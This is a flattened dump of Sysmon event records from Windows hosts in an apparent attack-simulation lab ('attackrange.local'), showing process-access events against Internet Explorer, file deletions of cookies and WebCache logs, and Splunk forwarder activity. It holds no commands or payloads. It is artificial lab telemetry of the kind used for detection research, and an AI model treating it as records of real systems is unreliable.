(x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000041971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.131{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000041970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.130{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000041969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.130{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000041968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.130{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000041967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.005{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1190706B523DA8B7EFBEA81375693C23,SHA256=A2DC63091901AC7C0129A1C2844FD990AB842F23CBF73DCC865373D938EE6657,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016527Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:15.565{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58899C5E5093606E40E359316A20B0EE,SHA256=45D58EFB90E556524C1EC09516E93BC82BA472CB40E17DD761512CBF5152642D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.610{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56300-false10.0.1.12-8000- 23542300x800000000000000041998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:15.524{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E4A83F0F45301F72C2DC8051A04AFDA,SHA256=2A62FFB4A705D32CD39D40C8209FD5C887B349E1E67277A554D02442BA80A94F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016529Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:16.646{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D793DFB4BBD4A455968AA95F94BC7AD7,SHA256=0DC557CB252B100771A4F5F984C4F5DA6B1AB21C9070098D61DEA8096E116AE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.630{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.630{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.630{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+99ed7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\SYSTEM32\IEUI.dll+54ab|C:\Windows\SYSTEM32\IEFRAME.dll+a54d3|C:\Windows\SYSTEM32\IEFRAME.dll+cf83b|C:\Windows\SYSTEM32\IEFRAME.dll+f94d8 10341000x800000000000000042011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.630{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.630{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.630{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AF2EA29121631197BF65EB51BA4713D,SHA256=42891850B569391BEF0C1CFD773650D0B9A08C17D3FDB35FA7D3CC44C7BF0C1D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.630{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005740C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.630{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005740C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.614{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+9b8a1|C:\Windows\System32\SHELL32.dll+9a403|C:\Windows\System32\SHELL32.dll+9a334|C:\Windows\System32\SHELL32.dll+99dd2|C:\Windows\SYSTEM32\IEFRAME.dll+11d72c|C:\Windows\SYSTEM32\IEFRAME.dll+a3d72|C:\Windows\SYSTEM32\IEFRAME.dll+a61d6|C:\Windows\SYSTEM32\IEFRAME.dll+ab8f4|C:\Windows\SYSTEM32\IEFRAME.dll+965be|C:\Windows\SYSTEM32\IEFRAME.dll+a8c61|C:\Windows\SYSTEM32\IEFRAME.dll+9cbdd|C:\Windows\SYSTEM32\IEFRAME.dll+9da89|C:\Windows\SYSTEM32\IEFRAME.dll+9df92|C:\Windows\SYSTEM32\IEFRAME.dll+64998|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b8d|C:\Windows\SYSTEM32\IEFRAME.dll+a585b|C:\Windows\SYSTEM32\IEFRAME.dll+cf83b|C:\Windows\SYSTEM32\IEFRAME.dll+f94d8 10341000x800000000000000042005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.614{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+9b81d|C:\Windows\System32\SHELL32.dll+9a403|C:\Windows\System32\SHELL32.dll+9a334|C:\Windows\System32\SHELL32.dll+99dd2|C:\Windows\SYSTEM32\IEFRAME.dll+11d72c|C:\Windows\SYSTEM32\IEFRAME.dll+a3d72|C:\Windows\SYSTEM32\IEFRAME.dll+a61d6|C:\Windows\SYSTEM32\IEFRAME.dll+ab8f4|C:\Windows\SYSTEM32\IEFRAME.dll+965be|C:\Windows\SYSTEM32\IEFRAME.dll+a8c61|C:\Windows\SYSTEM32\IEFRAME.dll+9cbdd|C:\Windows\SYSTEM32\IEFRAME.dll+9da89|C:\Windows\SYSTEM32\IEFRAME.dll+9df92|C:\Windows\SYSTEM32\IEFRAME.dll+64998|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b8d|C:\Windows\SYSTEM32\IEFRAME.dll+a585b|C:\Windows\SYSTEM32\IEFRAME.dll+cf83b|C:\Windows\SYSTEM32\IEFRAME.dll+f94d8 10341000x800000000000000042004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.614{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+9b801|C:\Windows\System32\SHELL32.dll+9a403|C:\Windows\System32\SHELL32.dll+9a334|C:\Windows\System32\SHELL32.dll+99dd2|C:\Windows\SYSTEM32\IEFRAME.dll+11d72c|C:\Windows\SYSTEM32\IEFRAME.dll+a3d72|C:\Windows\SYSTEM32\IEFRAME.dll+a61d6|C:\Windows\SYSTEM32\IEFRAME.dll+ab8f4|C:\Windows\SYSTEM32\IEFRAME.dll+965be|C:\Windows\SYSTEM32\IEFRAME.dll+a8c61|C:\Windows\SYSTEM32\IEFRAME.dll+9cbdd|C:\Windows\SYSTEM32\IEFRAME.dll+9da89|C:\Windows\SYSTEM32\IEFRAME.dll+9df92|C:\Windows\SYSTEM32\IEFRAME.dll+64998|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000042003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.614{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+9b801|C:\Windows\System32\SHELL32.dll+9a403|C:\Windows\System32\SHELL32.dll+9a334|C:\Windows\System32\SHELL32.dll+99dd2|C:\Windows\SYSTEM32\IEFRAME.dll+11d72c|C:\Windows\SYSTEM32\IEFRAME.dll+a3d72|C:\Windows\SYSTEM32\IEFRAME.dll+a61d6|C:\Windows\SYSTEM32\IEFRAME.dll+ab8f4|C:\Windows\SYSTEM32\IEFRAME.dll+965be|C:\Windows\SYSTEM32\IEFRAME.dll+a8c61|C:\Windows\SYSTEM32\IEFRAME.dll+9cbdd|C:\Windows\SYSTEM32\IEFRAME.dll+9da89|C:\Windows\SYSTEM32\IEFRAME.dll+9df92|C:\Windows\SYSTEM32\IEFRAME.dll+64998|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b8d 23542300x800000000000000042002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.551{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V010000D.logMD5=E06BD43F13E9404AA0F18BE960867321,SHA256=0E587FCAEA6C4472B2CE0B3B38891185B050D7119F23198D1F9474811818C490,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.536{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V010000C.logMD5=0AEEC504FC4FFABC51A600748B5C6F69,SHA256=339C14CB0BAEFE5F22E9FFF63019337CBD478EFB2854DDCD5E068B336075C37F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:16.536{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V010000B.logMD5=404613F441A2B35D77ED3F00E72C7659,SHA256=66F4157B1021415A95E035C20D77BEBE1893B6A2935DF5CB5698F46DA2716F69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016528Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:16.400{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1A878CF444AABFF7290921A9D1CD856F,SHA256=A7B0804717742290198E2348D7390D09B81D65F447E8019BC5EB9A6566DA4F63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016531Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:17.739{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CCA38EB4F58048B6AA0CEA26402A718,SHA256=4C4AB03B025C2B519117FA7B98218A6EBA1BADC01669C7C3F8E6FF54B0F9E4E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000042015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:17.626{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74DBDA667FBAABF636581F2053A2034B,SHA256=BBD6DC41A93D95992A18E81B6587EF72C68881D216DC87F3A32000B955333694,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016530Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:15.999{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50099-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016532Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:18.820{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2F2CAF996373BA5C59A386AB3E1A40D,SHA256=ECF9E0905852A7F3480631DDA1506D3EE2FFF51C9724A41A5FF282D2D54B407E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000042028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.724{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=229A4B30F37168F7987A9992D117A94D,SHA256=853B9391169797773AFCA55BA6081E149DC03CCF7CDA4191400700D10858DED7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.490{FE4C2B44-E474-63C7-2706-00000000AF02}704ATTACKRANGE\AdministratorC:\Program Files\Internet Explorer\iexplore.exeC:\Users\ADMINI~1\AppData\Local\Temp\Kno28ED.tmpMD5=002D5646771D31D1E7C57990CC020150,SHA256=1E2E25BF730FF20C89D57AA38F7F34BE7690820E8279B20127D0014DD27B743F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.459{FE4C2B44-E474-63C7-2706-00000000AF02}704ATTACKRANGE\AdministratorC:\Program Files\Internet Explorer\iexplore.exeC:\Users\ADMINI~1\AppData\Local\Temp\Kno28ED.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.459{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCookies\9J4ZOD4E.cookieMD5=A8F6155652E44DD17F9F5AFC5FCA298E,SHA256=B775FAA11DF42710504C0BDA4959BC7E8E705C9EA8D91033C32C4C0310DD2E89,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.459{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCookies\UIY2XXTT.cookieMD5=468AEDC7B4530F39B9B55A95D22DD800,SHA256=2546C12D8E93CA902046531E6B3541A0D75446252D3B3774C89038AB6FC6C265,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:18.266{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eb73|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+108e3d|C:\Windows\SYSTEM32\IEFRAME.dll+108beb|C:\Windows\SYSTEM32\IEFRAME.dll+1ded5|C:\Windows\SYSTEM32\IEFRAME.dll+1e6f9|C:\Windows\SYSTEM32\IEFRAME.dll+f356|C:\Windows\SYSTEM32\IEFRAME.dll+f88f|C:\Windows\SYSTEM32\IEFRAME.dll+fca1|C:\Windows\SYSTEM32\IEFRAME.dll+fac4|C:\Windows\SYSTEM32\IEFRAME.dll+fa21|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 